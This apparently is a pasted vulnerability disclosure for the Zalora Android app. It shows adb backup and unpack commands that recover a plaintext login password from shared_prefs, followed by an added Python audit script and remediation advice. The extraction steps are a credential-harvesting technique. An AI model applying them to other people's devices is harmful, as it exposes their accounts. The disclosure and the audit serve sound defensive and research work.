Zalora

a guest
Apr 21st, 2019
#Application: Zalora
#Platform: Android
#Version: 6.15.1 (latest)
#Severity: Medium
#Impact: Non-root user can read the password in clear text and log in to the application.

POC:

1. Back up the application data to the local PC:
adb backup -f ~/zalora.ab -noapk com.zalora.android

2. Convert "zalora.ab" into a tar file (the file contains the backup data of com.zalora.android):
java -jar abe.jar unpack ~/zalora.ab zalora.tar ""

3. Extract the tar file:
tar -xvf zalora.tar

4. After extraction, inspect the data in the directory apps/com.zalora.android/

5. Look for sensitive data. The password is stored in plain text in /shared_prefs/login_data.xml:

<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="login_data">{&quot;password&quot;:&quot;P4ssw0rd123&quot;,&quot;email&quot;:&quot;testme@gmail.com&quot;}</string>
</map>
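Added example, not part of the paste and not code from the Zalora app: a small Python audit that a developer or reviewer can run over the directory produced by steps 1 to 4 to flag plaintext credentials in SharedPreferences XML files. It embeds the login_data.xml from step 5 as a constructed sample; the sensitive-key pattern and the directory layout it walks are assumptions, and secret values are reported only by length.

```python
# Added example (not from the original paste): audit an extracted Android backup
# for plaintext credentials in shared_prefs XML files.
import json
import re
import sys
import xml.etree.ElementTree as ET
from pathlib import Path

# Preference / JSON key names that should never hold a plaintext value.
# The pattern is an assumption; extend it for the app under review.
SENSITIVE_KEY = re.compile(r"pass(word|wd)?|secret|token|\bpin\b|credential", re.IGNORECASE)

# Constructed sample: the login_data.xml shown in the paste.
SAMPLE_PREFS = """<?xml version='1.0' encoding='utf-8' standalone='yes' ?>
<map>
<string name="login_data">{&quot;password&quot;:&quot;P4ssw0rd123&quot;,&quot;email&quot;:&quot;testme@gmail.com&quot;}</string>
</map>
"""


def mask(value: str) -> str:
    """Never echo the secret itself; report only its length."""
    return "*" * len(value)


def findings_in_prefs(xml_text: str, source: str = "<memory>") -> list[dict]:
    """Return one finding per sensitive plaintext value in a SharedPreferences XML document."""
    findings: list[dict] = []
    # Encode to bytes so the XML declaration is honoured; the parser unescapes &quot; for us.
    root = ET.fromstring(xml_text.encode("utf-8"))
    if root.tag != "map":
        return findings  # not a SharedPreferences file
    for elem in root:
        pref = elem.get("name", "")
        value = elem.text or ""
        if not value:
            continue  # boolean/int prefs keep their value in an attribute; not credentials
        # Case 1: the preference itself is named like a secret, e.g. <string name="password">
        if SENSITIVE_KEY.search(pref):
            findings.append({"file": source, "pref": pref, "key": None, "masked": mask(value)})
        # Case 2: the value is a JSON object embedding secrets, as with login_data above
        try:
            obj = json.loads(value)
        except ValueError:
            continue
        if isinstance(obj, dict):
            for key, val in obj.items():
                if isinstance(val, str) and val and SENSITIVE_KEY.search(key):
                    findings.append({"file": source, "pref": pref, "key": key, "masked": mask(val)})
    return findings


def scan_backup(extracted_root: str) -> list[dict]:
    """Walk an unpacked backup (apps/<package>/...) and audit every XML file found.
    The paste shows shared_prefs/; abe-unpacked backups may use sp/ instead (assumption),
    so every XML under the tree is tried and non-preference XML is skipped."""
    results: list[dict] = []
    for path in Path(extracted_root).rglob("*.xml"):
        try:
            results.extend(findings_in_prefs(path.read_text(encoding="utf-8"), str(path)))
        except (OSError, ET.ParseError, UnicodeDecodeError):
            continue
    return results


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    hits = scan_backup(target) if target else findings_in_prefs(SAMPLE_PREFS, "login_data.xml")
    for hit in hits:
        where = f"{hit['file']} pref={hit['pref']}" + (f" key={hit['key']}" if hit["key"] else "")
        print(f"PLAINTEXT CREDENTIAL: {where} value={hit['masked']}")
    sys.exit(1 if hits else 0)
```

Saved under any name (audit_prefs.py here) and run as `python audit_prefs.py apps/com.zalora.android/` after step 4, it exits non-zero when a finding exists; with no argument it audits the embedded sample and reports the password field of login_data. A clean run is a check, not a fix: the remediation is to stop persisting the password at all and keep only a revocable session token, to hold any secret that must persist in EncryptedSharedPreferences backed by the Android Keystore, and to set android:allowBackup="false" in the manifest so adb backup does not export the app's private data in the first place.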